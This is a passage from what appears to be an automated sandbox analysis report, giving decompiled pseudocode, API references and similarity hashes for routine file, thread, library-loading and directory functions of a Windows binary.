				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E008397E9(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E008396E2(_t25);
						}
					}
				}
				return _t15;
			}

0x008396e5
0x008396e8
0x008396ee
0x008396f8
0x008396f8
0x0083970a
0x00839712
0x0083976e
0x00839714
0x00839716
0x0083971d
0x00839736
0x0083973a
0x0083974b
0x0083974f
0x00839769
0x00839769
0x0083975b
0x0083975b
0x00839764
0x00000000
0x00839766
0x00839766
0x00000000
0x00839766
0x00839764
0x0083973c
0x0083973c
0x00839745
0x00000000
0x00839747
0x00839747
0x00839747
0x00839745
0x0083971f
0x0083971f
0x00839727
0x00000000
0x00839729
0x00839729
0x0083972a
0x0083972a
0x0083972f
0x0083972f
0x00839727
0x0083971d
0x00839776

APIs

GetStdHandle.KERNEL32(000000F6), ref: 008396F2
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 0083970A
GetLastError.KERNEL32 ref: 0083973C
GetLastError.KERNEL32 ref: 0083975B

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: e9c58a6b80c5a9206caad2218c4d31f4d3dbead675d51e0925b2586e6b8ad298
Instruction ID: dedfa2504d336e0bb857c1840feac7c116c4b43aa4358ee3d1197b1ad0984118
Opcode Fuzzy Hash: e9c58a6b80c5a9206caad2218c4d31f4d3dbead675d51e0925b2586e6b8ad298
Instruction Fuzzy Hash: EB11AC34924609EBDF206F65C944A7A77ADFB91360F10C52AF8AAC51D0D7B48C40CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00859A87, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00859A87(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x890768 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x865ba0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x14325216
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00859a8c
0x00859a90
0x00859a97
0x00859a9b
0x00859aa9
0x00859ab9
0x00859abf
0x00859ac3
0x00859aec
0x00859aee
0x00859af2
0x00859af5
0x00859af5
0x00859afb
0x00859afd
0x00000000
0x00859afe
0x00859ac5
0x00859ace
0x00859add
0x00859ad0
0x00859ad3
0x00859ad9
0x00859ad9
0x00859ae1
0x00000000
0x00859ae3
0x00859ae6
0x00859ae8
0x00000000
0x00859ae8
0x00859ae1
0x00859a9d
0x00859aa2
0x00000000

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00852E6F,00000000,00000000,?,00859A2E,00852E6F,00000000,00000000,00000000,?,00859C2B,00000006,FlsSetValue), ref: 00859AB9
GetLastError.KERNEL32(?,00859A2E,00852E6F,00000000,00000000,00000000,?,00859C2B,00000006,FlsSetValue,00866058,00866060,00000000,00000364,?,00858643), ref: 00859AC5
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00859A2E,00852E6F,00000000,00000000,00000000,?,00859C2B,00000006,FlsSetValue,00866058,00866060,00000000), ref: 00859AD3

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 99850ddefeeb4613ea3f8a6f7ac012035d5b0338b8d912328e35778b23e6a6ae
Instruction ID: aafd4c6c9c98cdde3fb9649e9b72b2a9f0c73931f1e2410c2470b29384330070
Opcode Fuzzy Hash: 99850ddefeeb4613ea3f8a6f7ac012035d5b0338b8d912328e35778b23e6a6ae
Instruction Fuzzy Hash: E201A736615636EBCB228A69AC44A577B9CFF057B2B210661FD86D7180D760DC05C6F0

Uniqueness

Uniqueness Score: -1.00%

Function 0084A3FB, Relevance: 6.0, APIs: 4, Instructions: 30
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0084A3FB() {
				struct tagMSG _v32;
				int _t6;
				long _t12;

				_t6 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t6 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					TranslateMessage( &_v32);
					_t12 = DispatchMessageW( &_v32); // executed
					return _t12;
				}
				return _t6;
			}

0x0084a40c
0x0084a414
0x0084a41d
0x0084a427
0x0084a431
0x00000000
0x0084a431
0x0084a43b

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0084A40C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084A41D
TranslateMessage.USER32(?), ref: 0084A427
DispatchMessageW.USER32(?), ref: 0084A431

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: d068dd70ab40820be42d4a0f7695ad9ee3b818ece0cc8c9f08c095c784037127
Instruction ID: 5221974ab5ecbb3d141cbddfda07cc4baa77e16c1fcfb794d6c6d49f85dbaa73
Opcode Fuzzy Hash: d068dd70ab40820be42d4a0f7695ad9ee3b818ece0cc8c9f08c095c784037127
Instruction Fuzzy Hash: 59E0ED71E0222EA78B20ABE6AC0CCDF7F6CFE062A17015411F50ED2000DAA89105C7F0

Uniqueness

Uniqueness Score: -1.00%

Function 0084050F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0084050F() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0x8700e0 > 0) {
					_t18 = 0x8700e4;
					do {
						_t7 = CreateThread(0, 0x10000, E00840649, 0x8700e0, 0,  &_v4); // executed
						_t22 = _t7;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0x8700e0);
							E00836DE3(E0084E76A(E00836DE8(0x8700e0)), 0x8700e0, 0x8700e0, 2);
						}
						 *_t18 = _t22;
						 *0x00870164 =  *((intOrPtr*)(0x870164)) + 1;
						_t8 =  *0x877368; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0x8700e0);
					return _t8;
				}
				return _t5;
			}

0x00840514
0x00840518
0x0084051c
0x0084051f
0x00840533
0x00840539
0x0084053d
0x0084053f
0x00840544
0x00840561
0x00840561
0x00840566
0x00840568
0x0084056e
0x00840575
0x0084057a
0x0084057a
0x00840580
0x00840581
0x00840584
0x00000000
0x00840589
0x0084058d

APIs

CreateThread.KERNELBASE ref: 00840533
SetThreadPriority.KERNEL32(?,00000000), ref: 0084057A

Part of subcall function 00836DE8: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00836E06

Strings

CreateThread failed, xrefs: 0084053F

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 17398438598dc231dd39ccb1fd6cf01b4f896e34aff221de7ebcb7c21a6c1177
Instruction ID: 14b9cc8ac9265c3e925c29cfc6bbfba828a66a579034cb35469082ee4ec0bcb5
Opcode Fuzzy Hash: 17398438598dc231dd39ccb1fd6cf01b4f896e34aff221de7ebcb7c21a6c1177
Instruction Fuzzy Hash: E101D6B2348709ABD2246E689C41B677358FB40761F11402DFB96E6280DAB1A854CE71

Uniqueness

Uniqueness Score: -1.00%

Function 0083DA8B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0083DA8B(int _a4) {
				signed int _t4;
				int _t9;
				void* _t13;
				signed int _t14;
				signed int _t15;
				WCHAR* _t17;

				_t4 =  *0x874128; // 0x6
				_t5 = _t4 + 1;
				asm("sbb esi, esi");
				_t15 = _t14 & _t4 + 0x00000001;
				 *0x874128 = _t15;
				_t17 = (_t15 << 0xb) + 0x870128;
				 *_t17 = 0;
				if(E0083CF62(0x870078, _t13, _t5 - 8, _a4, _t17, 0x400, 0, 0) == 0) {
					_t9 = LoadStringW( *0x870060, _a4, _t17, 0x400); // executed
					if(_t9 == 0) {
						LoadStringW( *0x870064, _a4, _t17, 0x400);
					}
				}
				return _t17;
			}

0x0083da8b
0x0083da97
0x0083daa0
0x0083daa2
0x0083daa7
0x0083dab2
0x0083dabd
0x0083dac7
0x0083dad5
0x0083dadd
0x0083daeb
0x0083daeb
0x0083dadd
0x0083daf5

APIs

LoadStringW.USER32(?,?,00000400,00000000), ref: 0083DAD5
LoadStringW.USER32(?,?,00000400), ref: 0083DAEB

Strings

0Z, xrefs: 0083DA90

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString
String ID: 0Z
API String ID: 2948472770-3845847589
Opcode ID: 1bc5ed28ad2ecce7ba4476da33233d05169f767655cca3e027f911f146634f8b
Instruction ID: fed69f940d5c72a06c0ec8d967dcc3b18ad8ac49d901a12a7182185763b1345a
Opcode Fuzzy Hash: 1bc5ed28ad2ecce7ba4476da33233d05169f767655cca3e027f911f146634f8b
Instruction Fuzzy Hash: B5F0B476A00220BFDB209F60AC48D577E9DFB597A1B015025FE49E2120D735CC94CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00839CD8, Relevance: 4.6, APIs: 3, Instructions: 96
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00839CD8(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
				void* __ebp;
				int _t24;
				long _t32;
				void* _t36;
				void* _t42;
				void* _t52;
				intOrPtr* _t53;
				void* _t57;
				intOrPtr _t58;
				long _t59;

				_t52 = __edx;
				_t59 = _a8;
				_t53 = __ecx;
				if(_t59 != 0) {
					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
						 *(_t53 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						_a8 = _a8 & 0x00000000;
						_t42 = 0;
						if( *((intOrPtr*)(_t53 + 0xc)) == 0) {
							goto L12;
						}
						_t57 = 0;
						if(_t59 == 0) {
							L14:
							if( *((char*)(_t53 + 0x14)) == 0 ||  *((intOrPtr*)(_t53 + 0xc)) != 0) {
								L21:
								 *((char*)(_t53 + 8)) = 1;
								return _t42;
							} else {
								_t56 = _t53 + 0x1e;
								if(E00836D6F(0x8700e0, _t53 + 0x1e, 0) == 0) {
									E00836FB0(0x8700e0, _t59, 0, _t56);
									goto L21;
								}
								if(_a8 < _t59 && _a8 > 0) {
									_t58 =  *_t53;
									_t36 =  *((intOrPtr*)(_t58 + 0x14))(0);
									asm("sbb edx, 0x0");
									 *((intOrPtr*)(_t58 + 0x10))(_t36 - _a8, _t52);
								}
								continue;
							}
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_t32 = _t59 - _t57;
							if(_t32 >= 0x4000) {
								_t32 = 0x4000;
							}
							_t10 = WriteFile( *(_t53 + 4), _a4 + _t57, _t32,  &_a8, 0) - 1; // -1
							asm("sbb bl, bl");
							_t42 =  ~_t10 + 1;
							if(_t42 == 0) {
								goto L14;
							}
							_t57 = _t57 + 0x4000;
							if(_t57 < _t59) {
								continue;
							}
							L13:
							if(_t42 != 0) {
								goto L21;
							}
							goto L14;
						}
						goto L14;
						L12:
						_t24 = WriteFile( *(_t53 + 4), _a4, _t59,  &_a8, 0); // executed
						asm("sbb al, al");
						_t42 =  ~(_t24 - 1) + 1;
						goto L13;
					}
				}
				return 1;
			}

0x00839cd8
0x00839cd9
0x00839cde
0x00839ce2
0x00839cef
0x00839cf9
0x00839cf9
0x00839cfe
0x00839cfe
0x00839d03
0x00839d09
0x00000000
0x00000000
0x00839d0b
0x00839d0f
0x00839d73
0x00839d77
0x00839dd1
0x00839dd4
0x00000000
0x00839d7f
0x00839d81
0x00839d91
0x00839dcc
0x00000000
0x00839dcc
0x00839d97
0x00839da8
0x00839dae
0x00839db7
0x00839dbc
0x00839dbc
0x00000000
0x00839d97
0x00000000
0x00000000
0x00000000
0x00839d11
0x00839d11
0x00839d13
0x00839d1a
0x00839d1c
0x00839d1c
0x00839d39
0x00839d3e
0x00839d40
0x00839d43
0x00000000
0x00000000
0x00839d45
0x00839d4d
0x00000000
0x00000000
0x00839d6f
0x00839d71
0x00000000
0x00000000
0x00000000
0x00839d71
0x00000000
0x00839d51
0x00839d60
0x00839d69
0x00839d6d
0x00000000
0x00839d6d
0x00839cfe
0x00000000

APIs

GetStdHandle.KERNEL32(000000F5,?,?,0083C9A7,00000001,?,?,?,00000000,00844B67,?,?,?,?,?,0084460C), ref: 00839CF3
WriteFile.KERNEL32(?,00000000,?,00844814,00000000,?,?,00000000,00844B67,?,?,?,?,?,0084460C,?), ref: 00839D33
WriteFile.KERNELBASE(?,00000000,?,00844814,00000000,?,00000001,?,?,0083C9A7,00000001,?,?,?,00000000,00844B67), ref: 00839D60

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 21c206721206dbd9590b0a531d93b1c44900426fbb8b383394bbe2f549ece91c
Instruction ID: ff90c96cace81fd802c74b1e7159881d5ad830d7560977ba7c8c63d322381215
Opcode Fuzzy Hash: 21c206721206dbd9590b0a531d93b1c44900426fbb8b383394bbe2f549ece91c
Instruction Fuzzy Hash: FA310571208609BFDB249E14D849B66B7A8FF90310F048119F5D6D35D0C7F4E849CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00839F96, Relevance: 4.6, APIs: 3, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00839F96(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E0084D9C0();
				_t21 = _a4;
				_t8 =  *(E0083B9C4(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E00839F0F(_t21) != 0 || E0083B3C9(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E0083A1D3(_t21, _a12);
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}

0x00839f9e
0x00839fa4
0x00839fad
0x00839fb3
0x00839fc7
0x00839fcf
0x0083a00d
0x0083a013
0x0083a016
0x0083a022
0x0083a024
0x0083a018
0x0083a018
0x0083a01b
0x00000000
0x0083a01d
0x0083a01f
0x0083a01f
0x0083a01b
0x00000000
0x00000000
0x00000000
0x00839fba
0x00839fbd
0x00839fc5
0x00839ffa
0x00839ffe
0x0083a004
0x0083a004
0x0083a009
0x00000000
0x00000000
0x00000000
0x00839fc5
0x0083a029

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 00839FBD
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 00839FF0
GetLastError.KERNEL32(?,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 0083A00D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 0ea3af93e22371291ea75568810b676874e359592c09eda2609dd88ae19df885
Instruction ID: a236a98242e7cd1a3072d63b9cc2f93312f7dd28ad5a9534d6f7bb07b5f47ba0
Opcode Fuzzy Hash: 0ea3af93e22371291ea75568810b676874e359592c09eda2609dd88ae19df885
Instruction Fuzzy Hash: CD019E71100A58E6EB39EBA88C49BFA378CFF8A741F044451F9C2D5080DBA49981C6E7

Uniqueness

Uniqueness Score: -1.00%

Function 00833AAF, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00833AAF(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				E0084D8C4(E00861242, __ecx);
				E0084D9C0();
				_t151 = __ecx;
				_t156 =  *((char*)(__ecx + 0x6cc4));
				if( *((char*)(__ecx + 0x6cc4)) == 0) {
					__eflags =  *((char*)(__ecx + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E00836D22(__eflags, 0x1e, _t151 + 0x1e);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(__ecx + 0x45ec)) - ((0 |  *((intOrPtr*)(__ecx + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(__ecx + 0x5628) |  *(__ecx + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E0083C666(_t83, _t120);
						_push(_t120);
						E00841506(_t153 - 0xe6ec, __eflags);
						_t121 = 0;
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E008428B5(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E0083A7CC(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *((intOrPtr*)(_t151 + 0x2108)) =  *((intOrPtr*)(_t151 + 0x5628));
								 *((intOrPtr*)(_t151 + 0x210c)) =  *((intOrPtr*)(_t151 + 0x562c));
								 *((char*)(_t151 + 0x2110)) = _t121;
								E0083C719(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E0084254C(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
									_push(_t130); // executed
									E008391A3(_t121, _t130, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E0083A79A(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E00831F29(__eflags, 0x1f, _t151 + 0x1e, _t151 + 0x45f8);
									E00836F18(0x8700e0, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E00835E40(_t148);
									}
								}
								L25:
								E0084173E(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E0083C6D1(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
								E00831FC9(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E0083C736(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E00836D22(__eflags, 0x1e, _t151 + 0x1e);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x5669)) - _t83;
					if( *((intOrPtr*)(__ecx + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E00836D22(_t156, 0x1d, __ecx + 0x1e);
					E00836F18(0x8700e0, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

0x00833aaf
0x00833ab4
0x00833abe
0x00833ac4
0x00833ac6
0x00833acd
0x00833aeb
0x00833af2
0x00833d34
0x00833d3a
0x00000000
0x00833d3a
0x00833afa
0x00833b0b
0x00833b11
0x00000000
0x00000000
0x00833b1d
0x00833b1d
0x00833b23
0x00833b34
0x00833b35
0x00833b3e
0x00833b43
0x00833b4a
0x00833b4f
0x00833b5e
0x00833b61
0x00833b66
0x00833b69
0x00833b6c
0x00833bc1
0x00833bc1
0x00833bc7
0x00833c23
0x00833c31
0x00833c45
0x00833c52
0x00833c58
0x00833c5e
0x00833c66
0x00833c6c
0x00833c78
0x00833c84
0x00833c87
0x00833c8a
0x00833c90
0x00833c96
0x00833c9c
0x00833ca2
0x00833ca8
0x00833cae
0x00833cc7
0x00833cb0
0x00833cb0
0x00833cb1
0x00833cb2
0x00833cb3
0x00833cb3
0x00833ce1
0x00833ce3
0x00833cf2
0x00833cf4
0x00833d21
0x00833cf6
0x00833d03
0x00833d0f
0x00833d14
0x00833d16
0x00833d1a
0x00833d1a
0x00833d16
0x00833d23
0x00833d29
0x00833d2f
0x00000000
0x00833d31
0x00833bc9
0x00833bcf
0x00833bd5
0x00000000
0x00000000
0x00833bfe
0x00833c07
0x00833c07
0x00833c1e
0x00000000
0x00833c1e
0x00833b6e
0x00833b74
0x00833b94
0x00833b94
0x00833b96
0x00833ba9
0x00833bbc
0x00833b98
0x00833b98
0x00833b98
0x00000000
0x00833b96
0x00833b76
0x00833b84
0x00833b8a
0x00000000
0x00833b8a
0x00833b78
0x00833b82
0x00000000
0x00000000
0x00000000
0x00833b82
0x00833b25
0x00833b2b
0x00000000
0x00833b2d
0x00833b2d
0x00000000
0x00833b2d
0x00833acf
0x00833ad5
0x00833ae1
0x00833d3f
0x00833d3f
0x00833d41
0x00833d45
0x00833d4f
0x00833d4f

APIs

__EH_prolog.LIBCMT ref: 00833AB4

Strings

CMT, xrefs: 00833AC3

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 7e1d42a28cafaf340a87dc0fc162250c3e64ae29ddfe92e4ca553f0ef2c66b23
